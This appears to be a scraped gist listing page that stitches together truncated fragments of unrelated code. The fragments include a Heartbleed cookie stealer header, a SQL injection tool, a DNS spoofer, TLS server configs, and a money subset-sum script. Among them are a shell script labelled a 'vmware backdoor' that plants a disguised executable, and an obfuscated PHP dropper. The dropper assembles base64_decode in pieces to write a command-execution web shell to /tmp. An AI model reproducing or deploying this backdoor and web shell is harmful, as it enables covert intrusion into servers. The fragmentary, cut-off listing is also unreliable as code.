
#!/usr/bin/python
# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.
# Michael Davis (mike.philip.davis@gmail.com)
# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import select
// PhantomJS script
// Takes a screenshot of a given page. This correctly handles pages which
// dynamically load content making AJAX requests.
// Instead of waiting fixed amount of time before rendering, we give a short
// time for the page to make additional requests.
var _ = require('./lodash.js');
sbehrens / runner.py
Created September 6, 2014 03:48
Playing around with money problem
import itertools
from sys import exit
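# Candidate amounts. Repeated values are distinct items: itertools.combinations
# selects by position, so each entry can be used at most once per subset.
any_digits = [1.67, 1.98, 1.98, 4.41, 4.41, 4.41, 4.41, 4.41, 5.44, 36, 36, 36, 36, 36, 36, 36, 36, 100, 100]

# The target is kept as text because each sum is rendered to two decimals
# before comparison; this sidesteps binary floating-point rounding noise.
target = '241.40'

# NOTE(review): `exit` is imported above but unused in the visible lines, so
# this listing may be truncated after the match message -- confirm.

# Try every subset size, from the empty subset up to the full list.
for L in range(0, len(any_digits) + 1):
    for subset in itertools.combinations(any_digits, L):
        formatted = '%.2f' % sum(subset)
        print(formatted)
        # The original compared this formatted string with the float 241.40,
        # which is never equal, so a matching subset was never reported.
        if formatted == target:
            print('found it!')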
sbehrens / Apache.conf
Created February 27, 2015 21:16
Apache_SSL.conf
<VirtualHost *:443>
SSLEngine on
SSLCertificateFile /path/to/signed_certificate
SSLCertificateChainFile /path/to/intermediate_certificate
SSLCertificateKeyFile /path/to/private/key
SSLCACertificateFile /path/to/all_ca_certs
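# "modern" configuration as of this gist's date (February 2015), tweak to your needs.
# Re-check the protocol and cipher lists against current TLS guidance before reuse;
# the SSLProtocol line below still leaves TLSv1.1 enabled.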
SSLProtocol all -SSLv2 -SSLv3 -TLSv1
SSLCipherSuite ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!3DES:!MD5:!PSK
sbehrens / nginx.conf
Created February 27, 2015 21:16
nginx conf
server {
listen 443 ssl;
# certs sent to the client in SERVER HELLO are concatenated in ssl_certificate
ssl_certificate /path/to/signed_cert_plus_intermediates;
ssl_certificate_key /path/to/private_key;
ssl_session_timeout 5m;
ssl_session_cache shared:SSL:50m;
# Diffie-Hellman parameter for DHE ciphersuites, recommended 2048 bits
sbehrens / sql.py
Created December 7, 2011 17:06
SQL Injection Tool
##NOT FINISHED##
## ©mastahyeti 2011##
import urllib2
import urllib
import time
import math
CHARSET = [chr(x) for x in xrange(32,39)] + [chr(x) for x in xrange(40,127)] #everything but '
CHARSET_LEN = len(CHARSET)
# vmware backdoor if the dir don’t exist (which it should) create it anyway
mkdir -p /usr/lib/vmware-tools/bin32
vmwarestamp="`ls -l /usr/bin/lsof 2>log.error | awk {'print $6'}`"
echo $vmwarestamp
touch ./vmware-vnet1
chmod 755 ./vmware-vnet1
read -d '' vmware <<"BLOCK"
#!/bin/bash
<?PHP
$b = 'bas'.'e64'.'_de'.'code';
file_put_contents('/tmp/asd', $b('P D 9 Q S F A K Z n V u Y 3 R p b 2 4 g b G x l a H M o J G N t Z C w g J G F y c m F 5 I D 0 g d H J 1 Z S l 7 C i A g I C B p Z i A o I W V t c H R 5 K C R j b W Q p K X s K I C A g I C A g I C B p Z i A o Y G V j a G 8 g Y W A p e y A k c 2 F s a W R h W 1 0 9 K G A k Y 2 1 k Y C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g Y C R j b W R g J z t 9 C i A g I C A g I C A g C i A g I C A g I C A g Z W x z Z W l m I C h z a G V s b H B v c G V u K C d l Y 2 h v I G E n K S l 7 J H N h b G l k Y V t d P X N o Z W x s c G 9 w Z W 4 o J G N t Z C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g c G 9 w Z W 4 o J G N t Z C k n O 3 0 K I C A g I C A g I C A K I C A g I C A g I C B l b H N l a W Y g K H N o Z W x s X 2 V 4 Z W M o J 2 V j a G 8 g Y S c p K X s k c 2 F s a W R h W 1 0 9 c 2 h l b G x f Z X h l Y y g k Y 2 1 k K T s g J H N h b G l k Y V t d P S d N b 2 R v O i B z a G V s b F 9 l e G V j K C R j b W Q p J z t 9 C i A g
sbehrens / fakedns.py
Created June 20, 2012 18:43 — forked from btoews/fakedns.py
Nice DNS Spoofer
# File: fakedns.py
# Name: Interactive CLI DNS Spoofer
# by: @mastahyeti
#
# based off of http://code.activestate.com/recipes/491264/
from __future__ import print_function
from gevent.event import Event
from gevent.pool import Pool
from gevent import socket
CON
_clkmode = xtal1 + pll16x
_xinfreq = 5_000_000
VAR
long foodude
long datatown
byte hello